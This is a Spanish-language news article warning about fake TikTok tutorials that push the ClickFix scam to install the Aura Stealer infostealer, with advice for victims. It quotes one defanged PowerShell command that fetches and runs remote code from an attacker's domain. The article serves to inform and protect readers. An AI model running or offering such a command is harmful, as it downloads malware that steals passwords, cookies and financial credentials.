Cuidado con los tutoriales falsos en TikTok: así roban tus datos personales

TikTok no solo se ha convertido en una de las plataformas más populares del mundo, sino también en un terreno fértil para los ciberdelincuentes. 

En las últimas semanas, expertos en ciberseguridad detectaron una campaña de videos falsos que prometen enseñar cómo obtener programas y servicios premium —como Windows, Photoshop o Netflix— de manera gratuita. 

Sin embargo, detrás de estos supuestos tutoriales se esconde un fraude diseñado para robar contraseñas, datos personales y credenciales bancarias.

VER MÁS ¿Estás en la mira del vishing? Señales de alerta y la nueva tecnología para evitarlas

La IA se convierte en la nueva aliada para detectar llamadas sospechosas, ofreciendo datos en tiempo real y resúmenes de reportes de otros usuarios

¿Cómo funcionan los tutoriales falsos que circulan en TikTok?

La estafa utiliza una técnica conocida como ClickFix, una forma de ingeniería social en la que se ofrecen soluciones “rápidas” a problemas técnicos. 

Según el SANS Internet Storm Center y el portal de ciberseguridad Trend Micro, los videos instruyen a los usuarios para ejecutar comandos en PowerShell, la terminal de Windows, con la promesa de activar software de paga sin costo.

Por ejemplo, algunos creadores muestran comandos como iex (irm slmgr[.]win/photoshop) y aseguran que con solo copiarlos y pegarlos, el programa se desbloqueará. En realidad, ese código conecta el dispositivo a un servidor remoto que descarga malware y da acceso a los atacantes.

VER MÁS Toque fantasma: cómo opera esta nueva modalidad de estafa y cómo protegerte

Conoce esta nueva modalidad de estafa que aprovecha la tecnología para robar tu dinero sin contacto

¿Qué tipo de malware se instala en los dispositivos?

De acuerdo con un análisis de Bleeping Computer y el investigador Xavier Mertens, los comandos descargan dos archivos ejecutables, siendo el más peligroso una variante del Aura Stealer, un troyano diseñado para robar información sensible.

• Entre los datos sustraídos se encuentran:
• Contraseñas guardadas en navegadores.
• Cookies de autenticación.
• Billeteras digitales o de criptomonedas.
• Credenciales de redes sociales, correos y servicios bancarios.

El Aura Stealer puede incluso modificar su estructura para evadir los antivirus y seguir robando datos, convirtiendo los equipos infectados en parte de una red de bots o en plataformas para nuevos ataques.

VER MÁS ¿Cómo funciona la nueva estafa del falso repartidor sobre la que alertan las autoridades?

Este es el nuevo modus operandi de robo a casa habitación

¿Por qué los hackers usan TikTok para propagar virus?

TikTok se ha vuelto un espacio común para quienes buscan tutoriales rápidos o “trucos” tecnológicos. Los ciberdelincuentes aprovechan esa confianza y el formato breve de los videos para difundir sus engaños de forma más efectiva.

“Es una forma muy eficaz de ingeniería social. La confianza en los creadores y la simplicidad del contenido hacen que las personas actúen sin sospechar”, explicó Mertens en su informe para el SANS Internet Storm Center.

VER MÁS ¿Recibiste una llamada diciendo que tienen tu CV? Esto sabemos de esta nueva estafa

Usuarios reportan haber recibido llamadas del extranjero asegurándoles que tienen sus currículums vitae

¿Qué hacer si seguiste uno de estos tutoriales falsos?

Si un usuario ejecutó los comandos de estos videos, expertos recomiendan:

1. Cambiar todas las contraseñas de inmediato (correo, redes sociales, bancos, Netflix o Spotify).
2. Escanear el equipo con un antivirus actualizado y eliminar cualquier archivo sospechoso.
3. Desconectar el dispositivo de la red si se detecta actividad inusual.
4. Evitar ejecutar comandos o enlaces compartidos en videos o páginas no verificadas.

Además, mantener actualizado el sistema operativo y descargar software solo desde sitios oficiales reduce significativamente el riesgo de infección.